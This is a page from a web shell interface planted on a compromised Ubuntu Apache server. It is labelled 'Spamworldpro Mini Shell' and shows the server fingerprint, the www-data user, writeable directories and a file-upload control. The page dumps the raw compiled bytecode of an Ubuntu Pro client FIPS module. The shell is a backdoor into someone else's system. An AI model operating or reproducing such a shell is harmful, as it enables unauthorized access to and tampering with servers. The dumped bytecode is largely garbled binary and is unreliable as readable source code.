Spamworldpro Mini Shell
Spamworldpro


Server : Apache/2.4.52 (Ubuntu)
System : Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
User : www-data ( 33)
PHP Version : 8.1.2-1ubuntu2.21
Disable Function : NONE
Directory :  /lib/python3/dist-packages/uaclient/entitlements/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3/dist-packages/uaclient/entitlements/__pycache__/fips.cpython-310.pyc
o

���f�a�@s�ddlZddlZddlZddlmZddlmZmZmZm	Z	m
Z
ddlmZm
Z
mZmZmZmZmZddlmZmZddlmZddlmZddlmZdd	lmZdd
lmZddl m!Z!m"Z"ddl#m$Z$m%Z%m&Z&e�'�Z(e�)e�*e+��Z,gd
�Z-ddgZ.e-e.e-e.e-d�Z/gd�Z0gd�Z1gd�Z2e-e.e0e-e.e1e-e2d�Z3Gdd�dej4�Z5Gdd�de5�Z6Gdd�de5�Z7Gdd�de6�Z8dS)�N)�groupby)�Callable�List�Optional�Tuple�Union)�api�apt�event_logger�
exceptions�messages�system�util)�NoCloudTypeReason�get_cloud_type)�repo)�EntitlementWithMessage)�ApplicationStatus)�notices)�Notice)�ServicesOnceEnabledData�services_once_enabled_file)�MessagingOperations�MessagingOperationsDict�StaticAffordance)�
strongswan�strongswan-hmac�openssh-client�openssh-server�shim-signed�openssh-client-hmac�openssh-server-hmac)�xenial�bionic�focal)�openssl�libssl1.0.0�libssl1.0.0-hmac)r%�	libssl1.1�libssl1.1-hmac�libgcrypt20�libgcrypt20-hmacc	s�eZdZdZdZdZdZejj	Z
gd�Zedd��Z
ded	efd
d�Zdejfd
d�Zd	efdd�Zdejfdd�Z		d4dejdeeeded	df�fdd�
Zd	efdd�Z	d5deded	dfdd�Zded ed	ef�fd!d"�Zed	eed#ffd$d%��Zed	eef�fd&d'��Zd	ee eej!ff�fd(d)�Z"d6d*d+�Z#dejd	ef�fd,d-�Z$dejd	ef�fd.d/�Z%d0d1�Z&dejd	df�fd2d3�Z'�Z(S)7�FIPSCommonEntitlementi�zubuntu-pro-fips.gpgz/proc/sys/crypto/fips_enabledT)zfips-initramfszfips-initramfs-genericr*r+�libgmp10�libgnutls30�libhogweed6�
libnettle8r&r'r&r'r(r)�libssl3�
linux-fipsrr rr!r%zopenssl-fips-module-3rrrzubuntu-fipszubuntu-aws-fipszubuntu-azure-fips�ubuntu-gcp-fipscCs*t��j}t��rt�|g�St�|g�S)a�
        Dictionary of conditional packages to be installed when
        enabling FIPS services. For example, if we are enabling
        FIPS services in a machine that has openssh-client installed,
        we will perform two actions:

        1. Upgrade the package to the FIPS version
        2. Install the corresponding hmac version of that package
           when available.
        )r
�get_release_info�series�is_container�#FIPS_CONTAINER_CONDITIONAL_PACKAGES�get�FIPS_CONDITIONAL_PACKAGES)�selfr5�r;�</usr/lib/python3/dist-packages/uaclient/entitlements/fips.py�conditional_packages�s
z*FIPSCommonEntitlement.conditional_packages�
assume_yes�returncCs�t��j}|durt�d�dSt�d|�}t�d�}|durL|durL|�	d�}t�
d||�t�||�dkrJt�
tjj||d	��tjtj|d
�SdSt�d||�dS)
ztCheck if installing a FIPS kernel will downgrade the kernel
        and prompt for confirmation if it will.
        Nz Cannot gather kernel informationFz!(?P<kernel_version>\d+\.\d+\.\d+)r2�kernel_versionz*Kernel information: cur='%s' and fips='%s'r)�current_version�new_version)�msgr>z2Cannot gather kernel information for '%s' and '%s'T)r
�get_kernel_info�proc_version_signature_version�LOG�warning�re�searchr	�get_pkg_candidate_version�group�debug�version_compare�event�infor�KERNEL_DOWNGRADE_WARNING�formatr�prompt_for_confirmation�
PROMPT_YES_NO)r:r>�our_full_kernel_str�our_m�fips_kernel_version_str�our_kernel_version_strr;r;r<�prompt_if_kernel_downgrade�sJ�
�

������	��z0FIPSCommonEntitlement.prompt_if_kernel_downgrade�progresscCs�g}t��}tt|j�dd�d�}|D]\}}||vr||7}q|D](}ztj|gddigd�d�Wq"tjyJ|�dt	j
j|j|d	��Yq"wdS)
NcSs|�dd�S)Nz-hmac�)�replace)�pkg_namer;r;r<�<lambda>��zNFIPSCommonEntitlement.hardcoded_install_conditional_packages.<locals>.<lambda>)�key�DEBIAN_FRONTEND�noninteractive�z--allow-downgradesz$-o Dpkg::Options::="--force-confdef"z$-o Dpkg::Options::="--force-confold"��packages�override_env_vars�apt_optionsrO)�service�pkg)
r	�get_installed_packages_namesr�sortedr=�run_apt_install_commandr�UbuntuProError�emitr�FIPS_PACKAGE_NOT_AVAILABLErQ�title)r:rY�desired_packages�installed_packages�
pkg_groupsr\�pkg_listrhr;r;r<�&hardcoded_install_conditional_packages�s4��
�	����z<FIPSCommonEntitlement.hardcoded_install_conditional_packagescCs*tj|jjdd�}t��jdv}|p|S)Nzfeatures.fips_auto_upgrade_all��config�
path_to_value>r$r#r")r�is_config_value_true�cfgr
r4r5)r:�install_all_updates_override�hardcoded_releaser;r;r<�auto_upgrade_all_on_enable�s
�
z0FIPSCommonEntitlement.auto_upgrade_all_on_enablecCs�dd�t�|j�D�}|��t|�dkrJz"|�dtjjd�	|�d��|�
|�tj|ddigd	�d
�WdStj
yI|�dtj�YdSwdS)NcSsg|]}|j�qSr;)�name)�.0�packager;r;r<�
<listcomp>�s��zMFIPSCommonEntitlement.install_all_available_fips_upgrades.<locals>.<listcomp>rrO� )rdr`rarbrc)r	�;get_installed_packages_with_uninstalled_candidate_in_origin�origin�sort�lenrmr�INSTALLING_PACKAGESrQ�join�unhold_packagesrkrrl�FIPS_PACKAGES_UPGRADE_FAILURE)r:rY�
to_upgrader;r;r<�#install_all_available_fips_upgrades�s0����
�	��z9FIPSCommonEntitlement.install_all_available_fips_upgradesN�package_list�cleanup_on_failurecsl|j}|rt�j||d�n|�tjj|jd��|��r#|�	|�n|�
|�|��r4t�
tj�dSdS)z�Install contract recommended packages for the entitlement.

        :param package_list: Optional package list to use instead of
            self.packages.
        :param cleanup_on_failure: Cleanup apt files if apt install fails.
        )r��roN)rd�super�install_packagesrYr�INSTALLING_SERVICE_PACKAGESrQror|r�rt�_check_for_rebootr�addr�FIPS_SYSTEM_REBOOT_REQUIRED)r:rYr�r��mandatory_packages��	__class__r;r<r�s"��
��z&FIPSCommonEntitlement.install_packagescCst��S)z=Check if system needs to be rebooted because of this service.)r
�
should_reboot�r:r;r;r<r�8sz'FIPSCommonEntitlement._check_for_rebootF�	operation�silentcCsN|��}t�|�|r#|st�tjj|d��|dkr%t�t	j
�dSdSdS)z�Check if user should be alerted that a reboot must be performed.

        @param operation: The operation being executed.
        @param silent: Boolean set True to silence print/log of messages
        )r�zdisable operationN)r�rN�needs_rebootrOr�ENABLE_REBOOT_REQUIRED_TMPLrQrr�r�FIPS_DISABLE_REBOOT_REQUIRED)r:r�r��reboot_requiredr;r;r<�_check_for_reboot_msg<s
����z+FIPSCommonEntitlement._check_for_reboot_msgr5�cloud_idcs>|dkrtj|jjdd�rdS|dvrdStdt�jv�SdS)aVReturn False when FIPS is allowed on this cloud and series.

        On Xenial GCP there will be no cloud-optimized kernel so
        block default ubuntu-fips enable. This can be overridden in
        config with features.allow_xenial_fips_on_cloud.

        GCP doesn't yet have a cloud-optimized kernel or metapackage so
        block enable of fips if the contract does not specify ubuntu-gcp-fips.
        This also can be overridden in config with
        features.allow_default_fips_metapackage_on_gcp.

        :return: False when this cloud, series or config override allows FIPS.
        �gcez.features.allow_default_fips_metapackage_on_gcpruT)r#r$r3)rrxry�boolr�rd�r:r5r�r�r;r<�_allow_fips_on_cloud_instanceRs�z3FIPSCommonEntitlement._allow_fips_on_cloud_instance.cs^dddd�}t�\�}�durd�t��j�tjj���|���d�}|���fdd�d	ffS)
Nzan AWSzan Azureza GCP)�aws�azurer�rZ)r5�cloudcs�����S�N)r�r;�r�r:r5r;r<r]r^z:FIPSCommonEntitlement.static_affordances.<locals>.<lambda>T)	rr
r4r5r�FIPS_BLOCK_ON_CLOUDrQror8)r:�cloud_titles�_�blocked_messager;r�r<�static_affordancesqs

���z(FIPSCommonEntitlement.static_affordancescst��rgSt�jSr�)r
r6r�rdr�r�r;r<rd�szFIPSCommonEntitlement.packagescs�t���\}}t��rt��st�tj�||fSt	j
�|j�rSt�t
|j��s.t�tj�t�|j���dkrBt�tj�||fSt�tj�tjtjj|jd�fS|tjkr\||fStjtjfS)N�1)�	file_name)r��application_statusr
r6r�r�removerr��os�path�exists�FIPS_PROC_FILE�setrd�	load_file�strip�FIPS_MANUAL_DISABLE_URLr�r�DISABLEDr�FIPS_PROC_FILE_ERRORrQ�ENABLED�FIPS_REBOOT_REQUIRED)r:�super_status�	super_msgr�r;r<r��s:������
�z(FIPSCommonEntitlement.application_statuscCsTtt���}t|j��t|j��}|�|�}|r(t�t|�t	j
j|jd��dSdS)z�Remove fips meta package to disable the service.

        FIPS meta-package will unset grub config options which will deactivate
        FIPS on any related packages.
        r�N)
r�r	rird�
differencer=�intersection�remove_packages�listr�DISABLE_FAILED_TMPLrQro)r:rq�fips_metapackager�r;r;r<r��s
�
��z%FIPSCommonEntitlement.remove_packagescs8t��|�rt�tj�t�tj�t�tj�dSdS�NTF)r��_perform_enablerr�r�WRONG_FIPS_METAPACKAGE_ON_CLOUDr�r��r:rYr�r;r<r��s�z%FIPSCommonEntitlement._perform_enablecs(t��|�r|��rt�tj�dSdSr�)r��_perform_disabler�rr�rr�r�r�r;r<r��s�z&FIPSCommonEntitlement._perform_disablecCs|ddg}t�|tjjd�|�d��}g}|��D]}||vr#|�|�q|r<ddg|}t�|tjjd�|�d��}dSdS)Nzapt-mark�	showholdsr�)�command�unhold)r	�run_apt_commandr�EXECUTING_COMMAND_FAILEDrQr��
splitlines�append)r:�
package_names�cmd�holds�unholds�hold�
unhold_cmdr;r;r<r��s&�
����z%FIPSCommonEntitlement.unhold_packagescs|�|j�t��|�dS)z�Setup apt config based on the resourceToken and directives.

        FIPS-specifically handle apt-mark unhold

        :raise UbuntuProError: on failure to setup any aspect of this apt
           configuration
        N)r��fips_pro_package_holdsr��setup_apt_configr�r�r;r<r��sz&FIPSCommonEntitlement.setup_apt_config�NT)F)r?N))�__name__�
__module__�__qualname__�repo_pin_priority�
repo_key_filer��apt_noninteractiver�urls�FIPS_HOME_PAGE�help_doc_urlr��propertyr=r�rXr�ProgressWrapperrtr|r�rr�strr�r�r�r�rrr�rdr�NamedMessager�r�r�r�r�r��
__classcell__r;r;r�r<r,Vsp 
.
�#
�#��
���&���
�����
*
 r,cs�eZdZdZejZejZej	Z
dZejZ
edeedffdd��Zedeedff�fdd��Zedefd	d
��Zdejdef�fdd
�Z�ZS)�FIPSEntitlement�fips�
UbuntuFIPSr?.cCs:ddlm}ddlm}t|tj�tttj�t|tj	�fS)Nr)�LivepatchEntitlement��RealtimeKernelEntitlement)
�uaclient.entitlements.livepatchr��uaclient.entitlements.realtimer�rr�LIVEPATCH_INVALIDATES_FIPS�FIPSUpdatesEntitlement�FIPS_UPDATES_INVALIDATES_FIPS�REALTIME_FIPS_INCOMPATIBLE)r:r�r�r;r;r<�incompatible_servicess����z%FIPSEntitlement.incompatible_servicescs�t�j}t|jd�}tj}t|��d|k��t�	�}|r |j
nd�|tjj
|j|jd��fdd�dftjj
|j|jd��fdd�dffS)N)ryrF)r��fips_updatesc��Sr�r;r;)�is_fips_updates_enabledr;r<r](�z4FIPSEntitlement.static_affordances.<locals>.<lambda>cr�r�r;r;)�fips_updates_once_enabledr;r<r]/r�)r�r�r�ryrr�r�r�r�readr�r�$FIPS_ERROR_WHEN_FIPS_UPDATES_ENABLEDrQro�)FIPS_ERROR_WHEN_FIPS_UPDATES_ONCE_ENABLED)r:r�r��enabled_status�services_once_enabled_objr�)r�r�r<r�s2����
��
��z"FIPSEntitlement.static_affordancescCs|d}t��rtjj|jd�}|��stjg}n|j}d}|j	s-t
jdtjj|jd�ifg}t
jd|ifg|j
ifg||d�S�Nr�rC)�
pre_enable�pre_install�post_enable�pre_disable)r
r6r� PROMPT_FIPS_CONTAINER_PRE_ENABLErQror|�FIPS_RUN_APT_UPGRADE�pre_enable_msg�purgerrR�PROMPT_FIPS_PRE_DISABLErX�r:r�pre_enable_promptrr;r;r<�	messaging4�<������������zFIPSEntitlement.messagingrYcsRt�\}}|dur|tjkrt�d�t�tj�t	��
|�r't�t
j�dSdS)Nz>Could not determine cloud, defaulting to generic FIPS package.TF)rr�CLOUD_ID_ERRORrFrGrNrOr�.FIPS_COULD_NOT_DETERMINE_CLOUD_DEFAULT_PACKAGEr�r�rr�r�FIPS_INSTALL_OUT_OF_DATE)r:rY�
cloud_type�errorr�r;r<r�`s
��zFIPSEntitlement._perform_enable)r�r�r�r}r�
FIPS_TITLEro�FIPS_DESCRIPTION�description�FIPS_HELP_TEXT�	help_textr��PROMPT_FIPS_PRE_ENABLEr	r�rrr�rr�rrrr�r�r�r�r;r;r�r<r��s! +r�csneZdZdZejZdZejZ	ej
Zede
edffdd��Zedefdd��Zd	ejdef�fd
d�Z�ZS)r�zfips-updates�UbuntuFIPSUpdatesr?.cCs$ddlm}tttj�t|tj�fS)Nrr�)r�r�rr�r�FIPS_INVALIDATES_FIPS_UPDATES�"REALTIME_FIPS_UPDATES_INCOMPATIBLE)r:r�r;r;r<r�xs���z,FIPSUpdatesEntitlement.incompatible_servicescCs|d}t��rtjj|jd�}|��stjg}ntj}d}|j	s-t
jdtjj|jd�ifg}t
jd|ifg|j
ifg||d�Sr)r
r6rrrQror|r�PROMPT_FIPS_UPDATES_PRE_ENABLEr
rrRrrXrr;r;r<r�rz FIPSUpdatesEntitlement.messagingrYcs&t�j|d�rt�tdd��dSdS)N)rYT)r�F)r�r�r�writerr�r�r;r<r��s�z&FIPSUpdatesEntitlement._perform_enable)r�r�r�r}r�FIPS_UPDATES_TITLEror��FIPS_UPDATES_DESCRIPTIONr�FIPS_UPDATES_HELP_TEXTrr�rrr�rrrr�r�r�r�r;r;r�r<r�qs
 +r�csheZdZdZejZejZej	Z
dZejZ
dZedeedff�fdd��Zded	edefd
d�Z�ZS)�FIPSPreviewEntitlementzfips-preview�UbuntuFIPSPreviewzubuntu-pro-fips-preview.gpgr?.cst�jtttj�fSr�)r�r�rr�rrr�r�r;r<r��s
��z,FIPSPreviewEntitlement.incompatible_servicesr5r�cCsdSr�r;r�r;r;r<r��sz4FIPSPreviewEntitlement._allow_fips_on_cloud_instance)r�r�r�r}r�FIPS_PREVIEW_TITLEro�FIPS_PREVIEW_DESCRIPTIONr�FIPS_PREVIEW_HELP_TEXTrr��PROMPT_FIPS_PREVIEW_PRE_ENABLEr	r�r�rrr�r�r�r�r�r;r;r�r<r#�s"���r#)9�loggingr�rH�	itertoolsr�typingrrrrr�uaclientrr	r
rrr
r�uaclient.clouds.identityrr�uaclient.entitlementsr�uaclient.entitlements.baser�(uaclient.entitlements.entitlement_statusr�uaclient.filesr�uaclient.files.noticesr�uaclient.files.state_filesrr�uaclient.typesrrr�get_event_loggerrN�	getLogger�replace_top_level_logger_namer�rF�CONDITIONAL_PACKAGES_EVERYWHERE�!CONDITIONAL_PACKAGES_OPENSSH_HMACr9�&UBUNTU_FIPS_METAPACKAGE_DEPENDS_XENIAL�&UBUNTU_FIPS_METAPACKAGE_DEPENDS_BIONIC�%UBUNTU_FIPS_METAPACKAGE_DEPENDS_FOCALr7�RepoEntitlementr,r�r�r#r;r;r;r<�<module>sh$����������&xK

Spamworldpro Mini